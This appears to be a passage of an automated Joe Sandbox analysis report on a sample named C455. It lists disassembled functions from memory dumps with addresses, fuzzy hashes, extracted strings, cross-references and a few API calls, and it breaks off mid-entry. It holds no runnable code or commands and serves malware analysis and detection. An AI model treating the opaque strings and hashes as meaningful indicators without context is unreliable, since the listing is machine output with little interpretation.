API String ID: 0-923305466
Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757

Function 00415298 Relevance: 6.1, Strings: 4, Instructions: 1123COMMON

Download Yara Rule

Strings

kmbj, xrefs: 00415B8C
Z\, xrefs: 00415344
ydij, xrefs: 00415B93
in~x, xrefs: 00415AFB

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: in~x$kmbj$ydij$Z\
API String ID: 0-979945983
Opcode ID: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
Opcode Fuzzy Hash: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55

Function 00A0E1E7 Relevance: 5.9, Strings: 4, Instructions: 864COMMON

Download Yara Rule

Strings

[O_[, xrefs: 00A0E50F
)R_X, xrefs: 00A0E3D7
&-, xrefs: 00A0E601
zusR, xrefs: 00A0E3B5

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: &-$)R_X$[O_[$zusR
API String ID: 0-3432275560
Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
Instruction ID: a18a88660c7a77480f7c4acf0bbbc6e3d35eb30826fdb67aa3159cf5a24d28af
Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
Instruction Fuzzy Hash: CC42487050C3948FC725DF28D85076EBBE1AF96314F088A6DE8E54B3D2D7368909E752

Function 0041DF80 Relevance: 5.9, Strings: 4, Instructions: 864COMMON

Download Yara Rule

Strings

&-, xrefs: 0041E39A
[O_[, xrefs: 0041E2A8
)R_X, xrefs: 0041E170
zusR, xrefs: 0041E14E

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: &-$)R_X$[O_[$zusR
API String ID: 0-3432275560
Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A

Function 00A1B75E Relevance: 5.5, Strings: 4, Instructions: 523COMMON

Download Yara Rule

Strings

/, xrefs: 00A1BB6F
/26-, xrefs: 00A1B99C
%(#}, xrefs: 00A1B9A7
1, xrefs: 00A1BDC0

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: %(#}$/$/26-$1
API String ID: 0-261129489
Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
Instruction ID: 46dcabdacc1a7138d3a8bc08d20757b81bccd1ce5d9350535ceff7f5d53c6d7e
Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
Instruction Fuzzy Hash: B1E1067112D3C18BE725CF29C4517FABBD6EF92304F18896DD0D987292DB38844AC766

Function 0042B4F7 Relevance: 5.5, Strings: 4, Instructions: 523COMMON

Download Yara Rule

Strings

1, xrefs: 0042BB59
/, xrefs: 0042B908
%(#}, xrefs: 0042B740
/26-, xrefs: 0042B735

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: %(#}$/$/26-$1
API String ID: 0-261129489
Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796

Function 00A1B763 Relevance: 5.5, Strings: 4, Instructions: 519COMMON

Download Yara Rule

Strings

/, xrefs: 00A1BB6F
/26-, xrefs: 00A1B99C
%(#}, xrefs: 00A1B9A7
1, xrefs: 00A1BDC0

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: %(#}$/$/26-$1
API String ID: 0-261129489
Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
Instruction ID: f0878c0f4e6b90640118d36347c806bf9e6e7a715d824a71d7eba0bbf7764e43
Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
Instruction Fuzzy Hash: 22E1B17111D3C18AE7358F29C4607FABBD6AFD2304F1888ADC1C987292DB39454ACB26

Function 0042B4FC Relevance: 5.5, Strings: 4, Instructions: 519COMMON

Download Yara Rule

Strings

1, xrefs: 0042BB59
/, xrefs: 0042B908
%(#}, xrefs: 0042B740
/26-, xrefs: 0042B735

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: %(#}$/$/26-$1
API String ID: 0-261129489
Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56

Function 00418578 Relevance: 5.5, Strings: 4, Instructions: 455COMMON

Download Yara Rule

Strings

D@YO, xrefs: 00418B3E
^QRW, xrefs: 00418B45
"w+y, xrefs: 004185AB
?TUV, xrefs: 00418704

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: "w+y$?TUV$D@YO$^QRW
API String ID: 0-2418547040
Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44

Function 00431839 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00431887
GetSystemMetrics.USER32 ref: 00431896

Strings

, xrefs: 0043196A

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96

Function 009FD25A Relevance: 5.3, Strings: 4, Instructions: 291COMMON

Download Yara Rule

Strings

ZG, xrefs: 009FD4C1
pr, xrefs: 009FD558
3ej, xrefs: 009FD544
BI, xrefs: 009FD4BA

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: BI$ZG$3ej$pr
API String ID: 0-483502859
Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction ID: 9de214833fe22390c35ca05358b13cc06f1c20276c207ba8adbc8e5155641e97
Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction Fuzzy Hash: C4A1B2B52017818FD728CF29C590A62BBF2FF96304B1995ADC5DA8F766D734E802CB50

Function 0040CFF3 Relevance: 5.3, Strings: 4, Instructions: 291COMMON

Download Yara Rule

Strings

3ej, xrefs: 0040D2DD
BI, xrefs: 0040D253
pr, xrefs: 0040D2F1
ZG, xrefs: 0040D25A

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: BI$ZG$3ej$pr
API String ID: 0-483502859
Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54

Function 00426054 Relevance: 4.2, Strings: 3, Instructions: 483COMMON

Download Yara Rule

Strings

V3R5, xrefs: 00426774
dB, xrefs: 004264D2
67, xrefs: 0042677F

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: 67$V3R5$dB
API String ID: 0-2543814982
Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A

Function 00A087DF Relevance: 4.0, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

?TUV, xrefs: 00A0896B
DX8Z, xrefs: 00A08956
"w+y, xrefs: 00A08812

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: "w+y$?TUV$DX8Z
API String ID: 0-3307990326
Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
Instruction ID: 2aa6919072dba47b9270695e6991cc69ff0c1f6966d97f9deb27882b56acdda1
Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
Instruction Fuzzy Hash: 9D81CF716007128FC728CF29C890666B7F2FF95750B1A859DC8C24FBA5EB38E841CB49

Function 00A099D7 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON

Download Yara Rule

Strings

,)*k, xrefs: 00A0A0BB
I,~M, xrefs: 00A0A6AF

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: ,)*k$I,~M
API String ID: 0-936430989
Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
Instruction ID: d3af3e92236a745decfbbe2c9e8033ce2c1ec59482db8d4ef15ec14884f40bd1
Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
Instruction Fuzzy Hash: 5B82F7746083449FD7248F24E981B2FBBE2EBE6714F28892CE585872D2D771DC42DB46

Function 00419770 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON

Download Yara Rule

Strings

I,~M, xrefs: 0041A448
,)*k, xrefs: 00419E54

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ,)*k$I,~M
API String ID: 2994545307-936430989
Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
Opcode Fuzzy Hash: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A

Function 009FDF8C Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE ref: 009FDF9C

Strings

PT, xrefs: 009FE1CA

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: PT
API String ID: 3861434553-4135314810
Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction ID: 892c9111ce94c521bf1a1febb066dc54bb71faeab81a89d41d1d10e7c0823c63
Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction Fuzzy Hash: D0A1BEB46097818FD3268F29C4A0A62BFE1EF57300B19869CC5E24FB76D739D806CB15

Function 0040DD25 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0040DD35

Strings

PT, xrefs: 0040DF63

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: PT
API String ID: 3861434553-4135314810
Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55

Function 009FABA7 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

BE, xrefs: 009FADC4
de, xrefs: 009FAD5A

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: BE$de
API String ID: 0-1272349043
Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction ID: e94200b74e8a417b4f5815e679ba052d84524ab233434b6a79f828476795df97
Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction Fuzzy Hash: 19D128B164C3588BD328DF2888516BFFBE6ABC1304F18492CE9D59B395DA74C906C782

Function 0040A940 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

BE, xrefs: 0040AB5D
de, xrefs: 0040AAF3

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: BE$de
API String ID: 0-1272349043
Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787

Function 00A2CD87 Relevance: 2.6, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

ihgf, xrefs: 00A2CE7A
@, xrefs: 00A2CE5C

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: @$ihgf
API String ID: 0-73152791
Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
Instruction ID: ce647925ae45fb9e9e0dd8c027ed88576b0c0bfa8e1b2a68f0ab92baf40e059e
Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
Instruction Fuzzy Hash: 4B4102B1A043219BD714CF28D85267BB7A2FFD2328F15863CE4959B291E7359909CBC2

Function 0043CB20 Relevance: 2.6, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

@, xrefs: 0043CBF5
ihgf, xrefs: 0043CC13

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @$ihgf
API String ID: 2994545307-73152791
Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A

Function 00A0554C Relevance: 2.6, Strings: 2, Instructions: 113COMMON

Download Yara Rule

Strings

Z\, xrefs: 00A055AB
^P, xrefs: 00A055B2

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: Z\$^P
API String ID: 0-3724859648
Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
Instruction ID: 9a913c4ff872501d258d2759b5431873e733e25c77ebbcdf35c4131d46bbf4f6
Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
Instruction Fuzzy Hash: 1641B1B1911A04CFC718CF24C892A63B7B2FF99314B1A855CD4968F7A5E738E811CF55

Function 0042750D Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

`rB, xrefs: 00427341
AzB, xrefs: 004275AA

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: AzB$`rB
API String ID: 0-365317308
Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A

Function 00427326 Relevance: 2.5, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

`rB, xrefs: 00427341
AzB, xrefs: 004275AA

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: AzB$`rB
API String ID: 0-365317308
Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A

Function 00417582 Relevance: 2.2, Strings: 1, Instructions: 985COMMON

Download Yara Rule

Strings

c$, xrefs: 00417707

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: c$
API String ID: 0-2516980088
Opcode ID: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
Opcode Fuzzy Hash: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58

Function 00415F66 Relevance: 1.9, Strings: 1, Instructions: 605COMMON

Download Yara Rule

Strings

A67H, xrefs: 004164FD

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: A67H
API String ID: 0-3389657328
Opcode ID: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
Opcode Fuzzy Hash: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58

Function 00A08F35 Relevance: 1.8, Strings: 1, Instructions: 598COMMON

Download Yara Rule

Strings

[, xrefs: 00A0942B

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: [
API String ID: 0-3878419350
Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
Instruction ID: 2fd1bf05990d631ba587fd389ea0d49311f26da36ef97c77d6443b7f3cee7f27
Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
Instruction Fuzzy Hash: 3D021075600702CBCB24CF29C8D1663B7F2FF99714B19859CC4864FBA6EB39A852CB51

Function 00A26E67 Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

,)*k, xrefs: 00A26F8C

Memory Dump Source

Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9f0000_C455.jbxd

Yara matches

Similarity

API ID:
String ID: ,)*k
API String ID: 0-1228391949
Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
Instruction ID: 4aa44f4d7582517ea1750c016250647a61269be66e61a1d13236183b5a6c405e
Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
Instruction Fuzzy Hash: F0C14375A0C3309BD724DF68E880A2FBBE2AFD6704F199A3CE58563691D631DD04C792

Function 00436C00 Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

,)*k, xrefs: 00436D25

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ,)*k
API String ID: 2994545307-1228391949
Opcode ID: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
Opcode Fuzzy Hash: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A

Function 00427DA2 Relevance: 1.7, Strings: 1, Instructions: 447COMMON

Download Yara Rule

Strings

m, xrefs: 00427DE0

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

